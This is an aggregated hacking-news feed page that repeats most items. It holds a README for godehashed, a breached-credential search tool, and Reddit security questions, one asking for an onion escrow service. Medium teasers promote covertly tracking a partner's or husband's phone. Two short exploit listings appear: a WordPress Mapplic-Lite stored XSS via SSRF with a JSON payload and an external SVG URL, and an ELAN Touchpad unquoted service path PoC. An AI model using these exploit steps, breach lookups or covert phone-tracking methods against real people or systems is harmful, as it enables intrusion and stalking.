Godehashed - Tool That Uses The Dehashed.Com API To Search For Compromised Assets
A golang tool that uses the dehashed.com API to search for compromised assets. Results can then be compiled into a CSV for further analysis.Dehashed API You must supply the tool an api key. See apikey_template.txt for example. Installation To install the tool in CLI run the following command. Your $GOPATH must already be set. go get https://github.com/an00byss/godehashed Usage ./godehashed -s email -i apikey.txt -e SOMEDOMAIN -o leaks.csv Godehashed Usage():-e string Email we are searching for -i string Name of apikey to import. -n string Name we are searching for. -o string Outfile file name, will output in CSV Format. -p int Phone number we are searching for -s string Specify what we are searching for: "name", "email", "phone", "username" or "list". Then add corresponding switch. -u string Username we are searching for-l list Search a list of emails. Search Term Examples Email godehashed -s email -i apikey.txt -e SOMEDOMAIN.com -o leaks.csv List godehashed -s list -e email -i apikey.txt -l list.txt -o leaks.csv Username godehashed -s username -i apikey.txt -u USERNAME -o leaks.csv Name godehashed -s name -i apikey.txt -n "Name" -o leaks.csv Phone godehashed -s phone -i apikey.txt -p "phonenumber" -o leaks.csv Notice ! Legal disclaimer: Usage of godehashed for attacking targets withoutprior mutual consent is illegal. It is the end user's responsibilityto obey all applicable local, state and federal laws. Developers assumeno liability and are not responsible for any misuse or damage caused. Download Godehashed
Read more...
A golang tool that uses the dehashed.com API to search for compromised assets. Results can then be compiled into a CSV for further analysis.Dehashed API You must supply the tool an api key. See apikey_template.txt for example. Installation To install the tool in CLI run the following command. Your $GOPATH must already be set. go get https://github.com/an00byss/godehashed Usage ./godehashed -s email -i apikey.txt -e SOMEDOMAIN -o leaks.csv Godehashed Usage():-e string Email we are searching for -i string Name of apikey to import. -n string Name we are searching for. -o string Outfile file name, will output in CSV Format. -p int Phone number we are searching for -s string Specify what we are searching for: "name", "email", "phone", "username" or "list". Then add corresponding switch. -u string Username we are searching for-l list Search a list of emails. Search Term Examples Email godehashed -s email -i apikey.txt -e SOMEDOMAIN.com -o leaks.csv List godehashed -s list -e email -i apikey.txt -l list.txt -o leaks.csv Username godehashed -s username -i apikey.txt -u USERNAME -o leaks.csv Name godehashed -s name -i apikey.txt -n "Name" -o leaks.csv Phone godehashed -s phone -i apikey.txt -p "phonenumber" -o leaks.csv Notice ! Legal disclaimer: Usage of godehashed for attacking targets withoutprior mutual consent is illegal. It is the end user's responsibilityto obey all applicable local, state and federal laws. Developers assumeno liability and are not responsible for any misuse or damage caused. Download Godehashed
Read more...
GitHub
GitHub - an00byss/godehashed: A golang tool that uses the dehashed.com API to search for compromised assets.
A golang tool that uses the dehashed.com API to search for compromised assets. - GitHub - an00byss/godehashed: A golang tool that uses the dehashed.com API to search for compromised assets.
hacking: security in practice
Is there a database/search engine of default values?
I came a cross a fd.* subdomain and it took me some time until i found out it was an azure "frontdoor" subdomain, is there a website where i can search for default values such as this?(and also default passwords, file naming on specific technologies, extensions meaning, etc.)
It seems like a really useful thing IMO and i would be kind of surprise if there is no such place on the internet (and maybe i will create my own, who knows)
Thanks in advance!
submitted by /u/shitpost2021
[link] [comments]
Is there a database/search engine of default values?
I came a cross a fd.* subdomain and it took me some time until i found out it was an azure "frontdoor" subdomain, is there a website where i can search for default values such as this?(and also default passwords, file naming on specific technologies, extensions meaning, etc.)
It seems like a really useful thing IMO and i would be kind of surprise if there is no such place on the internet (and maybe i will create my own, who knows)
Thanks in advance!
submitted by /u/shitpost2021
[link] [comments]
reddit
Is there a database/search engine of default values?
I came a cross a fd.\* subdomain and it took me some time until i found out it was an azure "frontdoor" subdomain, is there a website where i can...
Needing of pentest software
https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/
<!-- SC_OFF -->I used to use a pen testing application a few years ago, i cant remember what it is called, so i'm looking for other free options. I have tried Burp, OWASP ZAP, w3af and none of them are what i"m looking for. trying to find a free or trial version of any other application that can do proper pen testing, I'm open to all options. TIA <!-- SC_ON --> submitted by /u/TheX3R0 (https://www.reddit.com/user/TheX3R0)
[link] (https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/) [comments] (https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/)
https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/
<!-- SC_OFF -->I used to use a pen testing application a few years ago, i cant remember what it is called, so i'm looking for other free options. I have tried Burp, OWASP ZAP, w3af and none of them are what i"m looking for. trying to find a free or trial version of any other application that can do proper pen testing, I'm open to all options. TIA <!-- SC_ON --> submitted by /u/TheX3R0 (https://www.reddit.com/user/TheX3R0)
[link] (https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/) [comments] (https://www.reddit.com/r/Pentesting/comments/mbdoo4/needing_of_pentest_software/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality
Hosted Reverse Shell generator with a ton of functionality. Features Generate common listeners and reverse shells Raw mode to cURL shells to your machine. Button to increment the listening port number by 1 URI and Base64 encoding LocalStorage to persist your configuration Dark and Light Modes Dev It’s recommended to use the netlify dev command […]
The post Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality appeared first on Kali Linux Tutorials.
Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality
Hosted Reverse Shell generator with a ton of functionality. Features Generate common listeners and reverse shells Raw mode to cURL shells to your machine. Button to increment the listening port number by 1 URI and Base64 encoding LocalStorage to persist your configuration Dark and Light Modes Dev It’s recommended to use the netlify dev command […]
The post Reverse Shell Generator : Hosted Reverse Shell Generator With A Ton Of Functionality appeared first on Kali Linux Tutorials.
Calling to all Pen Testers!!
https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/
<!-- SC_OFF -->I am looking to add top talent to our UK offensive security team. I have positions at all technical levels and across various specialisms here at NCC Group. If you are an experienced Pen Tester based in the UK and interested in what we could offer you please feel free to reach out to me on [belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)](mailto:belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)) <!-- SC_ON --> submitted by /u/BelleKyriacou (https://www.reddit.com/user/BelleKyriacou)
[link] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/) [comments] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/)
https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/
<!-- SC_OFF -->I am looking to add top talent to our UK offensive security team. I have positions at all technical levels and across various specialisms here at NCC Group. If you are an experienced Pen Tester based in the UK and interested in what we could offer you please feel free to reach out to me on [belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)](mailto:belle.kyriacou@nccgroup.com (mailto:belle.kyriacou@nccgroup.com)) <!-- SC_ON --> submitted by /u/BelleKyriacou (https://www.reddit.com/user/BelleKyriacou)
[link] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/) [comments] (https://www.reddit.com/r/Pentesting/comments/mbek6e/calling_to_all_pen_testers/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Making decent money on our porn sites. 18+ only.
https://cdn-images-1.medium.com/max/1920/0*NSAqmtXOt8-Di1-v.jpg
Greetings! Hackfreaks here. It turns out that you can not only strange your boa constrictor, but also earn decent money on this. Today we…
Continue reading on Medium »
Making decent money on our porn sites. 18+ only.
https://cdn-images-1.medium.com/max/1920/0*NSAqmtXOt8-Di1-v.jpg
Greetings! Hackfreaks here. It turns out that you can not only strange your boa constrictor, but also earn decent money on this. Today we…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to hack a phone easily and remotely
To snoop your partner’s activities on their phone, several methods will be discussed. Because of this video guide, you can now learn how…
Continue reading on Medium »
How to hack a phone easily and remotely
To snoop your partner’s activities on their phone, several methods will be discussed. Because of this video guide, you can now learn how…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How To Track My Husband’s Phone Secretly?
Because of this video guide, you can now learn how to read your girlfriends WhatsApp messages on an iPhone or android and have access to…
Continue reading on Medium »
How To Track My Husband’s Phone Secretly?
Because of this video guide, you can now learn how to read your girlfriends WhatsApp messages on an iPhone or android and have access to…
Continue reading on Medium »
Pwning PHP Websites: RFI & LFI
https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5
PHP is one of the widely used languages for web development ( more than 60% ) which makes it one of the most targeted ones.Continue reading on Developer Student Clubs SASTRA » (https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5)
https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5
PHP is one of the widely used languages for web development ( more than 60% ) which makes it one of the most targeted ones.Continue reading on Developer Student Clubs SASTRA » (https://medium.com/dsc-sastra-deemed-to-be-university/pwning-php-websites-rfi-lfi-5f28e6c31b4a?source=rss------bug_bounty-5)
hacking: security in practice
Escrow
Can anyone suggest to me an onion escrow service, please?
submitted by /u/yellow-sugar
[link] [comments]
Escrow
Can anyone suggest to me an onion escrow service, please?
submitted by /u/yellow-sugar
[link] [comments]
reddit
Escrow
Can anyone suggest to me an onion escrow service, please?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Data Protection Is a Group Effort
When every employee is well-versed in customer data privacy principles, the DPO knows the enterprise's sensitive data is in good hands.
Data Protection Is a Group Effort
When every employee is well-versed in customer data privacy principles, the DPO knows the enterprise's sensitive data is in good hands.
Exploit Collector
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
WordPress Mapplic-Lite plugin version 1.0 suffers from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
WordPress Mapplic-Lite plugin version 1.0 suffers from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
8713ec5c90e3494732055a63d7db0c05Download
#Title : Mapplic-Lite Wordpress Plugins Stored XSS Injection via SSRF
#Date : 22/03/2021
#Author : Eagle Eye
#Download : https://wordpress.org/plugins/mapplic-lite/
#Vendor Homepage : https://mapplic.com/
#Version Affected : Version 1.0
#Tested on : Google Chrome
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com
#1.Login as user
#2.Add Add/Edit Map
- [From Add]Enter github url with payload at "Map File (required)"
- [From Edit]Click raw and enter github url with payload
#Example [From edit]
{"mapwidth":"100","mapheight":"100","minimap":false,"clearbutton":true,"zoombuttons":true,"sidebar":false,
"search":false,"hovertip":true,"mousewheel":true,"fullscreen":false,"deeplinking":true,"mapfill":false,
"zoom":true,"alphabetic":false,"zoomlimit":"3","action":"tooltip","categories":[],
"levels":[{"id":"my-map","title":"My Map","map":"
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg
","minimap":"","locations":[]}]}
#Payload
<svg
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"
y="0px" width="960px" height="600px" viewBox="0 0 960 600"
enable-background="new 0 0 960 600" xml:space="preserve">
Source:packetstormsecurity.com
Kitploit
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
ELAN Touchpad version 15.2.13.1_X64_WHQL suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
ELAN Touchpad version 15.2.13.1_X64_WHQL suffers from an unquoted service path vulnerability.
MD5 |
b1190def32e41002204b0b182bd559edDownload
# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-22
# Vendor : ELAN Microelectronics
# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
# Vendor Homepage : http://www.emc.com.tw/
# Tested on OS: Windows 8
#This software installs EDTService.exe, version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc ETDService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ETDService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Elan Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
Source:packetstormsecurity.com
Kitploit
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.